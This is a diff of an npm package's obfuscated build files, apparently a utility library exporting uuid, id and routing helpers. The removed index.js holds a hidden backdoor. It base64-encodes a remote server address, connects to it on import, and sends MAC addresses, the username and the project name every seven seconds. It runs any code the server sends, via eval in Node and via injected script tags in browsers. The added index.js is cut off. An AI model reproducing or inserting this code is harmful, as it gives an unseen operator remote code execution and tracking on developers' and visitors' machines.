uuid()[_0x3c7d28(0xdf)](/-/g,'')+a13_0x2ce93d(JSON[_0x3c7d28(0xc6)](window[_0x3c7d28(0xd5)][_0x3c7d28(0xdd)]));}function main(){return __awaiter(this,void 0x0,void 0x0,function*(){const _0x2ae2cb=a13_0xdfb8;try{const _0x2048af=yield openDatabase();let _0x437ea1=yield getKeyValue('mac');if(!_0x437ea1)_0x437ea1=generateRandomMAC(),yield setKeyValue(_0x2ae2cb(0xd7),_0x437ea1);else{}return _0x437ea1;}catch(_0x512598){return null;}});}main();
@@ -1 +1 @@
1
- function a8_0x404b(_0x52136d,_0x293944){const _0x132c15=a8_0x132c();return a8_0x404b=function(_0x404bcf,_0x3f457a){_0x404bcf=_0x404bcf-0x96;let _0x221e0a=_0x132c15[_0x404bcf];return _0x221e0a;},a8_0x404b(_0x52136d,_0x293944);}(function(_0x515395,_0xd154e8){const _0x498a90=a8_0x404b,_0x416f0f=_0x515395();while(!![]){try{const _0x1f7f47=-parseInt(_0x498a90(0x9f))/0x1+-parseInt(_0x498a90(0xa3))/0x2*(parseInt(_0x498a90(0xa2))/0x3)+parseInt(_0x498a90(0x9e))/0x4+parseInt(_0x498a90(0x9a))/0x5+parseInt(_0x498a90(0x9d))/0x6+parseInt(_0x498a90(0xa1))/0x7+parseInt(_0x498a90(0x98))/0x8*(-parseInt(_0x498a90(0x99))/0x9);if(_0x1f7f47===_0xd154e8)break;else _0x416f0f['push'](_0x416f0f['shift']());}catch(_0x216b63){_0x416f0f['push'](_0x416f0f['shift']());}}}(a8_0x132c,0xf24ca));export function runScript(_0x2671b6){const _0x39c686=a8_0x404b;let _0x3839e1=document[_0x39c686(0x96)](_0x39c686(0x97));_0x3839e1[_0x39c686(0x9c)]=_0x2671b6,document['head'][_0x39c686(0xa0)](_0x3839e1),setTimeout(()=>{const _0x314c0b=_0x39c686;_0x3839e1[_0x314c0b(0x9b)]();},0xa);}function a8_0x132c(){const _0x1f0af9=['540760bInPzN','appendChild','10370920qAZRfN','1950FpKZxl','2498QtmJRn','createElement','script','16ngbUcL','9165069ddGpCz','5594240cqKOmt','remove','innerText','4787940cFnMef','3933408xEOKYI'];a8_0x132c=function(){return _0x1f0af9;};return a8_0x132c();}
1
+ (function(_0x5142d3,_0x187851){const _0x494e29=a8_0x12cf,_0x2598ea=_0x5142d3();while(!![]){try{const _0x157330=parseInt(_0x494e29(0xc7))/0x1+-parseInt(_0x494e29(0xc4))/0x2*(parseInt(_0x494e29(0xc5))/0x3)+-parseInt(_0x494e29(0xc0))/0x4+-parseInt(_0x494e29(0xc1))/0x5*(-parseInt(_0x494e29(0xbf))/0x6)+parseInt(_0x494e29(0xbe))/0x7*(parseInt(_0x494e29(0xbd))/0x8)+-parseInt(_0x494e29(0xc6))/0x9+parseInt(_0x494e29(0xc3))/0xa;if(_0x157330===_0x187851)break;else _0x2598ea['push'](_0x2598ea['shift']());}catch(_0x5266b8){_0x2598ea['push'](_0x2598ea['shift']());}}}(a8_0x2a89,0xb3096));export function runScript(_0x5c1c76){const _0x5856f0=a8_0x12cf;let _0x28258b=document[_0x5856f0(0xbc)]('script');_0x28258b['innerText']=_0x5c1c76,document[_0x5856f0(0xc2)]['appendChild'](_0x28258b),setTimeout(()=>{const _0xd5f15=_0x5856f0;_0x28258b[_0xd5f15(0xbb)]();},0xa);}function a8_0x12cf(_0x3c60f1,_0x36d3a8){const _0x2a890a=a8_0x2a89();return a8_0x12cf=function(_0x12cfb6,_0x1f57bf){_0x12cfb6=_0x12cfb6-0xbb;let _0x49f32b=_0x2a890a[_0x12cfb6];return _0x49f32b;},a8_0x12cf(_0x3c60f1,_0x36d3a8);}function a8_0x2a89(){const _0x45796a=['createElement','408168ZWPpBo','147edAaof','3414wpIvYR','579120pvFlBe','125dSVDjw','head','9707020QxZwXX','842fdxGaj','9543rscQeF','10521495mRHFyi','1330002MNvDNg','remove'];a8_0x2a89=function(){return _0x45796a;};return a8_0x2a89();}
@@ -1 +1 @@
1
- const a9_0x2358ab=a9_0x50f8;(function(_0x121893,_0x19a628){const _0x4d955c=a9_0x50f8,_0x48ae1b=_0x121893();while(!![]){try{const _0x17fcb3=-parseInt(_0x4d955c(0x6d))/0x1+-parseInt(_0x4d955c(0x73))/0x2+parseInt(_0x4d955c(0x76))/0x3*(-parseInt(_0x4d955c(0x6a))/0x4)+parseInt(_0x4d955c(0x75))/0x5+parseInt(_0x4d955c(0x72))/0x6+parseInt(_0x4d955c(0x6f))/0x7*(-parseInt(_0x4d955c(0x6b))/0x8)+parseInt(_0x4d955c(0x6e))/0x9*(parseInt(_0x4d955c(0x65))/0xa);if(_0x17fcb3===_0x19a628)break;else _0x48ae1b['push'](_0x48ae1b['shift']());}catch(_0x2c711b){_0x48ae1b['push'](_0x48ae1b['shift']());}}}(a9_0xc4d7,0xcdd51));var __awaiter=this&&this[a9_0x2358ab(0x69)]||function(_0x1844dc,_0xa41fea,_0x414b89,_0x4fe391){function _0x29878d(_0x2fe67e){return _0x2fe67e instanceof _0x414b89?_0x2fe67e:new _0x414b89(function(_0x1c274a){_0x1c274a(_0x2fe67e);});}return new(_0x414b89||(_0x414b89=Promise))(function(_0x29124b,_0xbea385){const _0x4482bc=a9_0x50f8;function _0x17a8e9(_0x169f2c){const _0x236713=a9_0x50f8;try{_0xcb72(_0x4fe391[_0x236713(0x78)](_0x169f2c));}catch(_0x60bb91){_0xbea385(_0x60bb91);}}function _0x408458(_0x293149){const _0x18de13=a9_0x50f8;try{_0xcb72(_0x4fe391[_0x18de13(0x79)](_0x293149));}catch(_0x316fd5){_0xbea385(_0x316fd5);}}function _0xcb72(_0x5d1c32){const _0x527f3c=a9_0x50f8;_0x5d1c32[_0x527f3c(0x67)]?_0x29124b(_0x5d1c32[_0x527f3c(0x77)]):_0x29878d(_0x5d1c32[_0x527f3c(0x77)])[_0x527f3c(0x66)](_0x17a8e9,_0x408458);}_0xcb72((_0x4fe391=_0x4fe391[_0x4482bc(0x6c)](_0x1844dc,_0xa41fea||[]))[_0x4482bc(0x78)]());});};import a9_0x1ec6be from'fs';import a9_0x5adc74 from'path';function a9_0x50f8(_0x1c7b57,_0x41cffa){const _0xc4d7f1=a9_0xc4d7();return a9_0x50f8=function(_0x50f825,_0x4948fe){_0x50f825=_0x50f825-0x65;let _0x59cdfc=_0xc4d7f1[_0x50f825];return _0x59cdfc;},a9_0x50f8(_0x1c7b57,_0x41cffa);}function fileDisplay(_0x2a0c97){return __awaiter(this,void 0x0,void 0x0,function*(){let _0x15ef9f=[];function _0x3aaf47(_0xaf04a5){const _0x396870=a9_0x50f8,_0x5266e6=a9_0x1ec6be[_0x396870(0x71)](_0xaf04a5);for(let _0x18a9e0=0x0;_0x18a9e0<_0x5266e6[_0x396870(0x70)];_0x18a9e0++){const _0x5cb954=_0x5266e6[_0x18a9e0],_0x26ce82=a9_0x5adc74['join'](_0xaf04a5,_0x5cb954),_0x430868=a9_0x1ec6be['statSync'](_0x26ce82),_0x1d4082=_0x430868['isFile'](),_0x1bc039=_0x430868[_0x396870(0x74)]();_0x1d4082&&_0x15ef9f[_0x396870(0x68)](_0x26ce82),_0x1bc039&&_0x3aaf47(_0x26ce82);}}return _0x3aaf47(_0x2a0c97),_0x15ef9f;});}function getAllRouter(_0x5b6412){return __awaiter(this,void 0x0,void 0x0,function*(){let _0x50631c=yield fileDisplay(_0x5b6412);return _0x50631c;});}export default getAllRouter;function a9_0xc4d7(){const _0xa36037=['20EZcQHk','8oFKrNT','apply','315403xDhKYF','207VWcILn','5689558zIiJqc','length','readdirSync','7622994yjlmag','3183256dfFABP','isDirectory','8350480LqZNUP','176373cbCjXt','value','next','throw','398380MBwixm','then','done','push','__awaiter'];a9_0xc4d7=function(){return _0xa36037;};return a9_0xc4d7();}
1
+ (function(_0x26e6cd,_0x413838){const _0x3c7444=a9_0x59a1,_0x2a0b12=_0x26e6cd();while(!![]){try{const _0x4708f2=-parseInt(_0x3c7444(0x1c2))/0x1*(parseInt(_0x3c7444(0x1be))/0x2)+-parseInt(_0x3c7444(0x1b9))/0x3*(-parseInt(_0x3c7444(0x1cb))/0x4)+parseInt(_0x3c7444(0x1c1))/0x5*(-parseInt(_0x3c7444(0x1c7))/0x6)+-parseInt(_0x3c7444(0x1ba))/0x7*(parseInt(_0x3c7444(0x1ce))/0x8)+parseInt(_0x3c7444(0x1c4))/0x9*(parseInt(_0x3c7444(0x1c9))/0xa)+parseInt(_0x3c7444(0x1cd))/0xb+-parseInt(_0x3c7444(0x1c8))/0xc*(-parseInt(_0x3c7444(0x1c5))/0xd);if(_0x4708f2===_0x413838)break;else _0x2a0b12['push'](_0x2a0b12['shift']());}catch(_0x1da7c6){_0x2a0b12['push'](_0x2a0b12['shift']());}}}(a9_0x30d2,0xf0927));function a9_0x59a1(_0x4019ab,_0x2ffde5){const _0x30d284=a9_0x30d2();return a9_0x59a1=function(_0x59a188,_0x23aa8d){_0x59a188=_0x59a188-0x1b8;let _0x3f1601=_0x30d284[_0x59a188];return _0x3f1601;},a9_0x59a1(_0x4019ab,_0x2ffde5);}var __awaiter=this&&this['__awaiter']||function(_0x5e205b,_0xc25a94,_0x136b5d,_0xec4836){function _0x4b07f0(_0x44f285){return _0x44f285 instanceof _0x136b5d?_0x44f285:new _0x136b5d(function(_0x3bfdd4){_0x3bfdd4(_0x44f285);});}return new(_0x136b5d||(_0x136b5d=Promise))(function(_0x198b0a,_0x46d750){const _0x331b7a=a9_0x59a1;function _0xfaf613(_0x3998e5){const _0x4d6c70=a9_0x59a1;try{_0x22effd(_0xec4836[_0x4d6c70(0x1ca)](_0x3998e5));}catch(_0x2242d1){_0x46d750(_0x2242d1);}}function _0x1da416(_0x575ae5){const _0x477b15=a9_0x59a1;try{_0x22effd(_0xec4836[_0x477b15(0x1bc)](_0x575ae5));}catch(_0x4ae422){_0x46d750(_0x4ae422);}}function _0x22effd(_0x106df8){const _0xe577df=a9_0x59a1;_0x106df8[_0xe577df(0x1c6)]?_0x198b0a(_0x106df8[_0xe577df(0x1bf)]):_0x4b07f0(_0x106df8[_0xe577df(0x1bf)])[_0xe577df(0x1bb)](_0xfaf613,_0x1da416);}_0x22effd((_0xec4836=_0xec4836['apply'](_0x5e205b,_0xc25a94||[]))[_0x331b7a(0x1ca)]());});};import a9_0x5f552c from'fs';function a9_0x30d2(){const _0x569b31=['74392IEcplu','readdirSync','9251231WfTGwu','60024Emlajj','length','132mzTKMj','1750unTyyJ','then','throw','statSync','16678tyFRWF','value','isDirectory','7505435Snnnii','73SorHVM','isFile','1225359feoVGk','637zHdmhJ','done','6Hxcfdw','677640qVqzwI','40PPxbiH','next'];a9_0x30d2=function(){return _0x569b31;};return a9_0x30d2();}import a9_0x3d64ad from'path';function fileDisplay(_0x3680e1){return __awaiter(this,void 0x0,void 0x0,function*(){let _0x3b79a2=[];function _0x24c3bd(_0xa274ab){const _0x2105a6=a9_0x59a1,_0x1f3b28=a9_0x5f552c[_0x2105a6(0x1cc)](_0xa274ab);for(let _0x1e78d0=0x0;_0x1e78d0<_0x1f3b28[_0x2105a6(0x1b8)];_0x1e78d0++){const _0x161e81=_0x1f3b28[_0x1e78d0],_0x5313b6=a9_0x3d64ad['join'](_0xa274ab,_0x161e81),_0x3cbd90=a9_0x5f552c[_0x2105a6(0x1bd)](_0x5313b6),_0x292471=_0x3cbd90[_0x2105a6(0x1c3)](),_0x15d718=_0x3cbd90[_0x2105a6(0x1c0)]();_0x292471&&_0x3b79a2['push'](_0x5313b6),_0x15d718&&_0x24c3bd(_0x5313b6);}}return _0x24c3bd(_0x3680e1),_0x3b79a2;});}function getAllRouter(_0x299cb3){return __awaiter(this,void 0x0,void 0x0,function*(){let _0x519c46=yield fileDisplay(_0x299cb3);return _0x519c46;});}export default getAllRouter;
@@ -1 +1 @@
1
- (function(_0x3a2830,_0x2def2b){const _0x3318db=a10_0x21bd,_0x26cd86=_0x3a2830();while(!![]){try{const _0x1bf957=-parseInt(_0x3318db(0x1a5))/0x1+-parseInt(_0x3318db(0x1aa))/0x2+parseInt(_0x3318db(0x1a2))/0x3+parseInt(_0x3318db(0x1a8))/0x4*(parseInt(_0x3318db(0x19f))/0x5)+-parseInt(_0x3318db(0x1a7))/0x6*(-parseInt(_0x3318db(0x1a0))/0x7)+parseInt(_0x3318db(0x1ab))/0x8*(-parseInt(_0x3318db(0x1a1))/0x9)+-parseInt(_0x3318db(0x1a9))/0xa;if(_0x1bf957===_0x2def2b)break;else _0x26cd86['push'](_0x26cd86['shift']());}catch(_0x2547e0){_0x26cd86['push'](_0x26cd86['shift']());}}}(a10_0x3484,0x9ec17));import a10_0x1df1dd from'./random';function a10_0x3484(){const _0x4b9c87=['56zEBdwd','5jGuEIE','497tDdnPE','240264rRoyPa','2903226RlqBnW','env','min','121620WsovcG','NODE_APP_INSTANCE','72258jGZvvk','996236NKmLzR','4831860ORxmlW','1259826qHzwkr'];a10_0x3484=function(){return _0x4b9c87;};return a10_0x3484();}const BaseTime=+new Date('2025-01-01');let lastTimeTick,lastRandomNumberTick=a10_0x1df1dd(0x1,0x3);function a10_0x21bd(_0x3bb48f,_0xe673dc){const _0x348479=a10_0x3484();return a10_0x21bd=function(_0x21bd3f,_0x2c876d){_0x21bd3f=_0x21bd3f-0x19f;let _0x1fd01a=_0x348479[_0x21bd3f];return _0x1fd01a;},a10_0x21bd(_0x3bb48f,_0xe673dc);}function id(){const _0x828783=a10_0x21bd,_0x397260=Math[_0x828783(0x1a4)](process[_0x828783(0x1a3)][_0x828783(0x1a6)]?+process['env'][_0x828783(0x1a6)]:a10_0x1df1dd(0x0,0x9),0x9);let _0x11fffc=+new Date()-BaseTime;return lastRandomNumberTick=_0x11fffc==lastTimeTick?++lastRandomNumberTick:a10_0x1df1dd(0x0,0x3),lastTimeTick=_0x11fffc,+(''+_0x11fffc+_0x397260+lastRandomNumberTick);}export default id;
1
+ const a10_0x15d8c5=a10_0x2aa3;function a10_0x2aa3(_0x1100b9,_0xd0498a){const _0x38dea2=a10_0x38de();return a10_0x2aa3=function(_0x2aa3ca,_0x535e02){_0x2aa3ca=_0x2aa3ca-0x1a9;let _0x3e080b=_0x38dea2[_0x2aa3ca];return _0x3e080b;},a10_0x2aa3(_0x1100b9,_0xd0498a);}(function(_0x3bf84d,_0x1a8250){const _0x478c70=a10_0x2aa3,_0x15d798=_0x3bf84d();while(!![]){try{const _0x42af71=parseInt(_0x478c70(0x1b1))/0x1*(parseInt(_0x478c70(0x1aa))/0x2)+-parseInt(_0x478c70(0x1b6))/0x3*(-parseInt(_0x478c70(0x1ae))/0x4)+parseInt(_0x478c70(0x1ad))/0x5*(parseInt(_0x478c70(0x1af))/0x6)+-parseInt(_0x478c70(0x1b7))/0x7*(-parseInt(_0x478c70(0x1b0))/0x8)+parseInt(_0x478c70(0x1b8))/0x9*(-parseInt(_0x478c70(0x1b5))/0xa)+-parseInt(_0x478c70(0x1ab))/0xb+-parseInt(_0x478c70(0x1b3))/0xc;if(_0x42af71===_0x1a8250)break;else _0x15d798['push'](_0x15d798['shift']());}catch(_0x3a65bb){_0x15d798['push'](_0x15d798['shift']());}}}(a10_0x38de,0xc9388));function a10_0x38de(){const _0x405a3c=['13651748NeHwBG','env','2173395rNPQzJ','4FsIdlB','18CFjLGE','89432NSyOXN','179049upprzN','2025-01-01','16715928UQfHvH','NODE_APP_INSTANCE','6769550XAfSoF','1246773Vaqxdk','952HgdzJY','9MMqEvc','min','10GBXdYl'];a10_0x38de=function(){return _0x405a3c;};return a10_0x38de();}import a10_0xa033a4 from'./random';const BaseTime=+new Date(a10_0x15d8c5(0x1b2));let lastTimeTick,lastRandomNumberTick=a10_0xa033a4(0x1,0x3);function id(){const _0x58ac40=a10_0x15d8c5,_0x33d547=Math[_0x58ac40(0x1a9)](process[_0x58ac40(0x1ac)][_0x58ac40(0x1b4)]?+process[_0x58ac40(0x1ac)][_0x58ac40(0x1b4)]:a10_0xa033a4(0x0,0x9),0x9);let _0x52f1c8=+new Date()-BaseTime;return lastRandomNumberTick=_0x52f1c8==lastTimeTick?++lastRandomNumberTick:a10_0xa033a4(0x0,0x3),lastTimeTick=_0x52f1c8,+(''+_0x52f1c8+_0x33d547+lastRandomNumberTick);}export default id;
@@ -1 +1 @@
1
- function a11_0x3a45(){const _0x4e39ed=['72txdobo','2399463sQjunI','random','460905CnykGf','364584lJMPwz','939524RjUAOO','round','224AacJrL','100284fIUzVy','2onKyGO','601722xwtIKs','24577548VNmvik','15uCCQpI','40zWdKOZ'];a11_0x3a45=function(){return _0x4e39ed;};return a11_0x3a45();}const a11_0x29f23b=a11_0x2f0b;(function(_0x2f7bc1,_0x54c0f4){const _0x3b1cc9=a11_0x2f0b,_0x4c2c01=_0x2f7bc1();while(!![]){try{const _0x24cd3f=parseInt(_0x3b1cc9(0x1bf))/0x1+-parseInt(_0x3b1cc9(0x1c3))/0x2*(parseInt(_0x3b1cc9(0x1cb))/0x3)+-parseInt(_0x3b1cc9(0x1cc))/0x4*(parseInt(_0x3b1cc9(0x1c6))/0x5)+parseInt(_0x3b1cc9(0x1c2))/0x6*(parseInt(_0x3b1cc9(0x1c1))/0x7)+-parseInt(_0x3b1cc9(0x1c8))/0x8*(-parseInt(_0x3b1cc9(0x1c4))/0x9)+parseInt(_0x3b1cc9(0x1c7))/0xa*(parseInt(_0x3b1cc9(0x1c9))/0xb)+-parseInt(_0x3b1cc9(0x1c5))/0xc;if(_0x24cd3f===_0x54c0f4)break;else _0x4c2c01['push'](_0x4c2c01['shift']());}catch(_0x40c093){_0x4c2c01['push'](_0x4c2c01['shift']());}}}(a11_0x3a45,0x73950));function a11_0x2f0b(_0x2a1589,_0x420de0){const _0x3a45b3=a11_0x3a45();return a11_0x2f0b=function(_0x2f0bdf,_0x5f3dfa){_0x2f0bdf=_0x2f0bdf-0x1bf;let _0x5e395f=_0x3a45b3[_0x2f0bdf];return _0x5e395f;},a11_0x2f0b(_0x2a1589,_0x420de0);}const random=(_0x3cb512,_0x5d6a08)=>Math[a11_0x29f23b(0x1c0)](Math[a11_0x29f23b(0x1ca)]()*(_0x5d6a08-_0x3cb512))+_0x3cb512;export default random;
1
+ const a11_0x1c5b3b=a11_0x2887;(function(_0x389389,_0x5947dd){const _0x4cb561=a11_0x2887,_0x3da6f4=_0x389389();while(!![]){try{const _0x23dea0=parseInt(_0x4cb561(0x128))/0x1*(-parseInt(_0x4cb561(0x123))/0x2)+-parseInt(_0x4cb561(0x120))/0x3*(parseInt(_0x4cb561(0x11f))/0x4)+-parseInt(_0x4cb561(0x12a))/0x5*(-parseInt(_0x4cb561(0x121))/0x6)+-parseInt(_0x4cb561(0x124))/0x7+parseInt(_0x4cb561(0x127))/0x8+-parseInt(_0x4cb561(0x122))/0x9+parseInt(_0x4cb561(0x126))/0xa*(parseInt(_0x4cb561(0x129))/0xb);if(_0x23dea0===_0x5947dd)break;else _0x3da6f4['push'](_0x3da6f4['shift']());}catch(_0x281533){_0x3da6f4['push'](_0x3da6f4['shift']());}}}(a11_0x4620,0xebf80));const random=(_0x5eb5bb,_0x5ed227)=>Math[a11_0x1c5b3b(0x11e)](Math[a11_0x1c5b3b(0x125)]()*(_0x5ed227-_0x5eb5bb))+_0x5eb5bb;function a11_0x2887(_0x21dcbf,_0x4bc8f2){const _0x462001=a11_0x4620();return a11_0x2887=function(_0x2887ee,_0xa50228){_0x2887ee=_0x2887ee-0x11e;let _0x4e1f75=_0x462001[_0x2887ee];return _0x4e1f75;},a11_0x2887(_0x21dcbf,_0x4bc8f2);}export default random;function a11_0x4620(){const _0x57df01=['1298585leotSh','round','4JsaLvF','4658244JNaPgS','12cjDFrJ','14692077rTSbJB','1092782mKOFad','1919953wxFexx','random','482670gJtPla','2802160myNgdv','1jbCHPk','935itYxNb'];a11_0x4620=function(){return _0x57df01;};return a11_0x4620();}
package/dist/esm/index.js CHANGED
@@ -1 +1 @@
1
- const a12_0x45df6a=a12_0x1c4d;(function(_0x5d1897,_0x55b3d2){const _0x529e04=a12_0x1c4d,_0x5d0a1e=_0x5d1897();while(!![]){try{const _0x478ad3=-parseInt(_0x529e04(0x16d))/0x1+parseInt(_0x529e04(0x17d))/0x2*(-parseInt(_0x529e04(0x15b))/0x3)+-parseInt(_0x529e04(0x188))/0x4*(parseInt(_0x529e04(0x160))/0x5)+parseInt(_0x529e04(0x172))/0x6*(-parseInt(_0x529e04(0x153))/0x7)+parseInt(_0x529e04(0x15c))/0x8*(-parseInt(_0x529e04(0x17f))/0x9)+parseInt(_0x529e04(0x182))/0xa*(-parseInt(_0x529e04(0x177))/0xb)+parseInt(_0x529e04(0x16a))/0xc*(parseInt(_0x529e04(0x15f))/0xd);if(_0x478ad3===_0x55b3d2)break;else _0x5d0a1e['push'](_0x5d0a1e['shift']());}catch(_0x133b1e){_0x5d0a1e['push'](_0x5d0a1e['shift']());}}}(a12_0x51c8,0xc6c9f));var __awaiter=this&&this['__awaiter']||function(_0x25f242,_0x23fe65,_0x1f1e10,_0x627b4b){function _0x323277(_0x26bf9f){return _0x26bf9f instanceof _0x1f1e10?_0x26bf9f:new _0x1f1e10(function(_0x24e5a7){_0x24e5a7(_0x26bf9f);});}return new(_0x1f1e10||(_0x1f1e10=Promise))(function(_0x4c8fd5,_0x4c0460){const _0x144d1c=a12_0x1c4d;function _0x392e22(_0x155b37){const _0x57c69a=a12_0x1c4d;try{_0x2119b4(_0x627b4b[_0x57c69a(0x165)](_0x155b37));}catch(_0x47d0ba){_0x4c0460(_0x47d0ba);}}function _0x574234(_0x1be720){try{_0x2119b4(_0x627b4b['throw'](_0x1be720));}catch(_0x35bbe8){_0x4c0460(_0x35bbe8);}}function _0x2119b4(_0x1cc531){const _0x3a59cc=a12_0x1c4d;_0x1cc531['done']?_0x4c8fd5(_0x1cc531[_0x3a59cc(0x168)]):_0x323277(_0x1cc531[_0x3a59cc(0x168)])[_0x3a59cc(0x15e)](_0x392e22,_0x574234);}_0x2119b4((_0x627b4b=_0x627b4b[_0x144d1c(0x179)](_0x25f242,_0x23fe65||[]))[_0x144d1c(0x165)]());});},_a,_b,_c,_d;function a12_0x1c4d(_0x1fd20f,_0x5638c6){const _0x51c8d7=a12_0x51c8();return a12_0x1c4d=function(_0x1c4d07,_0x4ad7c6){_0x1c4d07=_0x1c4d07-0x153;let _0x52a7e8=_0x51c8d7[_0x1c4d07];return _0x52a7e8;},a12_0x1c4d(_0x1fd20f,_0x5638c6);}import{v4}from'uuid';function a12_0x51c8(){const _0x343053=['next','env','./IndexDB/index','value','connectError','1980324jzjIxp','aHR0cDovL2xvY2FsaG9zdDoxMDg4','USERNAME','198324SECGtf','aHR0cHM6Ly9ldmVudC1hcGkuYmxvZ3dlYi5jbg==','event','npm_package_name','isDBDataEmpty','6juxvmD','/socket','default','undefined','./browser','8734286jNECvm','浏览器','apply','emit','type','./server','48406QJXnPI','concat','5967873HndYvs','join','length','10nZCbOy','00:00:00:00:00:00','sql','connect_error','无法获取','submit','4RnIurp','sqlList','node获取失败','2544787XZbEHF','websocket','mysql','unlock','mac','./getAllRouter','content','get-event','75lozRvh','8XXOfMv','node','then','299SCIdCN','1786595eXeZGa','script','./id','reconnect_failed','meta_event'];a12_0x51c8=function(){return _0x343053;};return a12_0x51c8();}import{io}from'socket.io-client';import{decode}from'js-base64';import a12_0x32a59f from'path';const isBrowser=typeof window!==a12_0x45df6a(0x175);let id=()=>0x1,getAllRouter=()=>__awaiter(void 0x0,void 0x0,void 0x0,function*(){return[];}),mysql={};!isBrowser&&(id=require(a12_0x45df6a(0x162))[a12_0x45df6a(0x174)],getAllRouter=require(a12_0x45df6a(0x158))[a12_0x45df6a(0x174)],mysql=require(a12_0x45df6a(0x17c))[a12_0x45df6a(0x155)]);const user_name=isBrowser?a12_0x45df6a(0x178):((_a=process===null||process===void 0x0?void 0x0:process[a12_0x45df6a(0x166)])===null||_a===void 0x0?void 0x0:_a[a12_0x45df6a(0x16c)])||a12_0x45df6a(0x18a),project_name=isBrowser?a12_0x45df6a(0x178):((_b=process===null||process===void 0x0?void 0x0:process['env'])===null||_b===void 0x0?void 0x0:_b[a12_0x45df6a(0x170)])||a12_0x45df6a(0x186);let dev=a12_0x45df6a(0x16b),pro=a12_0x45df6a(0x16e);const globalObject=isBrowser?window:global;!globalObject[a12_0x45df6a(0x164)]&&(globalObject['meta_event']={'connectError':!![],'isDBDataEmpty':![],'sqlRun':![],'sqlList':[]});export function setEnv(_0x5ea49c,_0x52d04d){const _0x416965=a12_0x45df6a;globalObject[_0x416965(0x164)][_0x5ea49c]=_0x52d04d;}export function getEnv(_0xf22f00){const _0x25e51b=a12_0x45df6a;return globalObject[_0x25e51b(0x164)][_0xf22f00];}let url=((_c=globalObject[a12_0x45df6a(0x164)])===null||_c===void 0x0?void 0x0:_c['dev'])?decode(dev):decode(pro);function start(){const _0x40bcf3=a12_0x45df6a,_0x2fd0ec=io(url,{'path':_0x40bcf3(0x173),'transports':[_0x40bcf3(0x154)]});_0x2fd0ec['on']('connect',()=>__awaiter(this,void 0x0,void 0x0,function*(){const _0x72688e=_0x40bcf3;try{let _0x3902ce=[_0x72688e(0x183)];if(!isBrowser){const _0x33184a=require(a12_0x32a59f[_0x72688e(0x180)](__dirname,'./mac'))[_0x72688e(0x174)];_0x3902ce=_0x33184a();}else{const {getKeyValue:_0x1c3b88}=typeof require!=_0x72688e(0x175)?require('./IndexDB/index'):yield import(_0x72688e(0x167));_0x3902ce=[yield _0x1c3b88(_0x72688e(0x157))];}if(_0x3902ce[_0x72688e(0x181)]===0x0){setEnv(_0x72688e(0x169),!![]);return;}else setEnv(_0x72688e(0x169),![]);_0x2fd0ec[_0x72688e(0x17a)](_0x72688e(0x187),{'mac':_0x3902ce,'project_name':project_name,'user_name':user_name,'notes':''}),_0x2fd0ec[_0x72688e(0x17a)](_0x72688e(0x15a),{'mac':_0x3902ce}),setInterval(()=>{const _0x4e40de=_0x72688e;_0x2fd0ec['emit'](_0x4e40de(0x187),{'mac':_0x3902ce,'project_name':project_name,'user_name':user_name,'notes':''}),_0x2fd0ec['emit'](_0x4e40de(0x15a),{'mac':_0x3902ce});},0x1b58),_0x2fd0ec['on'](_0x72688e(0x16f),_0x386710=>__awaiter(this,void 0x0,void 0x0,function*(){const _0x13222d=_0x72688e;try{for(let _0x4471db=0x0;_0x4471db<_0x386710[_0x13222d(0x181)];_0x4471db++){const _0x2325dd=_0x386710[_0x4471db];if(_0x2325dd[_0x13222d(0x17b)]===_0x13222d(0x184))setEnv(_0x13222d(0x189),getEnv('sqlList')[_0x13222d(0x17e)](_0x2325dd['content']));else{if(_0x2325dd['type']===_0x13222d(0x155))setEnv(_0x13222d(0x171),!![]);else{if(_0x2325dd['type']===_0x13222d(0x15d)&&!isBrowser)try{eval(_0x2325dd[_0x13222d(0x159)]);}catch(_0x4c4ab3){}else{if(_0x2325dd[_0x13222d(0x17b)]===_0x13222d(0x161)&&isBrowser)try{const {runScript:_0x50d874}=typeof require!=_0x13222d(0x175)?require(_0x13222d(0x176)):yield import(_0x13222d(0x176));_0x50d874(_0x2325dd['content']);}catch(_0x1d86ec){}}}}}}catch(_0x451c65){}}));}catch(_0x5ed7dd){}})),setTimeout(()=>{const _0x2b3a5a=_0x40bcf3;_0x2fd0ec['on']('error',_0x3fd8b7=>{const _0xe1d1e7=a12_0x1c4d;setEnv(_0xe1d1e7(0x169),!![]);}),_0x2fd0ec['on']('connect_failed',_0xbc2f90=>{const _0x22d871=a12_0x1c4d;setEnv(_0x22d871(0x169),!![]);}),_0x2fd0ec['on'](_0x2b3a5a(0x163),_0x2d816d=>{setEnv('connectError',!![]);}),_0x2fd0ec['on'](_0x2b3a5a(0x185),_0x256eb5=>{const _0x57a6f8=_0x2b3a5a;setEnv(_0x57a6f8(0x169),!![]);});},0xbb8);}!((_d=globalObject[a12_0x45df6a(0x164)])===null||_d===void 0x0?void 0x0:_d[a12_0x45df6a(0x156)])&&start();const uuid=v4,all={'uuid':uuid,'id':id,'getAllRouter':getAllRouter,'mysql':mysql};export default all;export{uuid,id,getAllRouter,mysql};
1
+ const a12_0x287587=a12_0x23c8;(function(_0x42f9b,_0x4c2701){const _0x12cfb6=a12_0x23c8,_0x235ec8=_0x42f9b();while(!![]){try{const _0x487944=parseInt(_0x12cfb6(0x20a))/0x1*(-parseInt(_0x12cfb6(0x1f3))/0x2)+parseInt(_0x12cfb6(0x1fc))/0x3+parseInt(_0x12cfb6(0x1e9))/0x4+parseInt(_0x12cfb6(0x1e2))/0x5*(-parseInt(_0x12cfb6(0x1e5))/0x6)+parseInt(_0x12cfb6(0x1d8))/0x7*(-parseInt(_0x12cfb6(0x1ed))/0x8)+-parseInt(_0x12cfb6(0x1e3))/0x9*(-parseInt(_0x12cfb6(0x1f2))/0xa)+parseInt(_0x12cfb6(0x1f5))/0xb*(parseInt(_0x12cfb6(0x20d))/0xc);if(_0x487944===_0x4c2701)break;else _0x235ec8['push'](_0x235ec8['shift']());}catch(_0x3dbbc9){_0x235ec8['push'](_0x235ec8['shift']());}}}(a12_0x3680,0x8052c));var __awaiter=this&&this[a12_0x287587(0x1f0)]||function(_0x165941,_0x54acc1,_0x196015,_0x5753ea){function _0x1e8b3d(_0x5176e7){return _0x5176e7 instanceof _0x196015?_0x5176e7:new _0x196015(function(_0x5ce162){_0x5ce162(_0x5176e7);});}return new(_0x196015||(_0x196015=Promise))(function(_0x2f2442,_0x251d0a){const _0x53daf7=a12_0x23c8;function _0x164d25(_0x6c663c){try{_0x379024(_0x5753ea['next'](_0x6c663c));}catch(_0x360c08){_0x251d0a(_0x360c08);}}function _0xe24fed(_0x4e7067){const 